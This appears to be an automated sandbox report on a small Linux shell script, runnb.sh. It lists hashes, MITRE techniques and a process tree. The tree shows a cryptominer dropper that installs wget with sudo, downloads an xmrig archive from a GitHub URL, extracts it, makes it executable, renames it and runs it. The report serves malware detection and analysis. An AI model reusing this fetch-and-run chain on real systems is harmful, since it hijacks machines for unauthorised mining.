Analysis
-
max time kernel
89s -
max time network
91s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30-10-2024 07:15
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral5
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral6
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral7
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 778 chmod -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Reads CPU attributes 1 TTPs 2 IoCs
Processes:
exim4exim4description ioc process File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online exim4 -
Processes:
tarmvsudosendmailsendmaildpkgdpkgaptaptdpkgdpkgdescription ioc process File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems mv File opened for reading /proc/self/fd sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
aptaptdescription ioc process File opened for modification /tmp/fileutl.message.WzI2V4 apt File opened for modification /tmp/fileutl.message.AvkAud apt File opened for modification /tmp/fileutl.message.ilkOfp apt File opened for modification /tmp/fileutl.message.zVpOt6 apt File opened for modification /tmp/fileutl.message.9nRvSD apt File opened for modification /tmp/fileutl.message.9dqMwE apt File opened for modification /tmp/fileutl.message.WcR0vO apt File opened for modification /tmp/fileutl.message.zlCY61 apt
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:712
-
/usr/bin/sudosudo apt install wget2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:716 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:730 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t621U-0000Bm-284⤵
- Reads CPU attributes
PID:749 -
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:736 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t621U-0000Bs-1a4⤵
- Reads CPU attributes
PID:750 -
/usr/bin/aptapt install wget3⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:747 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:757 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:774 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:775 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵PID:776
-
/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
PID:777 -
/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:778 -
/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:779 -
/tmp/cool./cool2⤵PID:780
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
847B
MD5640851a099b0924ef87da1bde9213496
SHA12975f67cdc149899512db1511f9d17100045a19b
SHA2565ce4beac9c7cdcddcb506f6d778e44f2d275efe164b6ffe5f46541814d5f6765
SHA51207af2336ef143c0c003f9cfd5c5a46e8a530b9509bd3936c0b746e50f610b6703c41f098fd0b6e3cc0fcfe04606bbc0ffd26bf4ff770bf276dcd908c2c29fe11
-
Filesize
1KB
MD57d1b7c9ec117e464c967b04e40dc917c
SHA1b5fdabb35301008b9e5f064f63957d991b20a2a1
SHA256fd0289931cd48ceef8402218759a0ef3c3b92709339888c9ef61b4e8d2212455
SHA5121e674622fcc30cfbbd3b54d65ad704f3210c68967f739f2cb9855c5203d5c40ad578d268aeab635ce7d31ab8a7dbb6bc89f045cc382cef93f028fa3304d43f11
-
Filesize
130B
MD5465045cd95f22ff11eb088e6815deb8c
SHA17c8bb7e84a9f75589605de5d7986dccade5bf361
SHA256b6971bba03378659f9406c0b79e1490c6e3db71f6078ec1ea0d2a95753970ea0
SHA51299cab2982d170a4e0c53b1883b0e4535da6595c50c96c2b1896ca5957e08fd53b2319949ee099e397ab738e9921ffa353a91c9bdfb447e29c37b8cb9aaced0db
-
Filesize
147B
MD5a24ea3361fe25750d01505bd9959709d
SHA15a59e407bd3d152365eff370a13ca22fcc8f1440
SHA2569b6509e68a6b9ef350873add87a33e226084b934414643d8c42e51f7b1876367
SHA51220f7a1236a64d5294df79084e0dae4c619af1e378856d23b3a9dec0b4d4466e25177e06c526b4b9abef3e69e35a2356ed032829dd819f76dc9d7d24d28fa58e6
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
918B
MD5139cdc49bf9445206aa7ee6ea933e643
SHA168cac77e2ac401ea4ec8e94a2bb786fe2a8102ba
SHA256839095038742ae5c454474d404af33f913d88f2704a45105b866c5eeafc69caa
SHA512a924692c692996c0daebd55180d1c32cbb42a269edccb4ab25553940359a4a7efb83a7dda91f7a7c34eeb37d8d3a8b5a6e477f852df39cd31cdfcf29a83334e2
-
Filesize
288B
MD55efc9207cd0527b0e4de128fc8cfee1d
SHA13dbb00c8481c7f534def163034bdf99d215d9d92
SHA256b758199e01d98ab56e6ededdf8426c397a6cbc6c13f457cc2bac7cc972f35254
SHA5124112913ab55bb61154498e838f6801ef70fc04329824eeb2cfbfe58ebc77c0cfd9b4ef337858eb3407a19fbc9f3df4c2fa065d1cd0686110cce0a6380b0cede0
-
Filesize
89B
MD5c49660faad3e44556c0822f5f1da6041
SHA17c33df99bf8e73818ce7440766b8793f4e8930e3
SHA25662bbe5d199844a74b0f060342c2bf6d363dadca074be8d27c68a3b26c8b9aef5
SHA5121e0cbb02fa67f484747ea3f862321c1ed3a8a001221f5d31c93d8b7d3db104ea7d32b277fa11fb41da0e86fb1a0b071f0e88ae86e5138da4b82e612c5eab0099
-
Filesize
288B
MD5083d7af4c669fd3df2c1e56c41aa4baa
SHA134ab5b10a8528613ff3403861ee052ca414877e3
SHA256d2526655c3f95d8926db262c8c0cc9057dfbf4b775680bbc769f622e2fa75d14
SHA512ee23993d96a57edf5fb34aec0b4d5e12a973fff5e77da910e59e7fe32e8d37641143df360597ec10a9eb35cdeabf183408d35879b44b359006d8fca9412aefec
-
Filesize
89B
MD59b2ae3e5e6d128b4320e9b74f1f2ce5b
SHA17304e9685912fb0a66192800ffa6e26ac18810ee
SHA2567d3ebb122cd5547a82cad74881bc2ac151574ca432a4a9a1b5951d72d6d78327
SHA512389a7056ad381e8bccaf4df7a3d224c14bcda22afd79b85f9f023e638c5a5d3f742dc35ccdcfc5fd9a05ba6339a7657b90d5f9bea348deb72fd100d9a06d53b0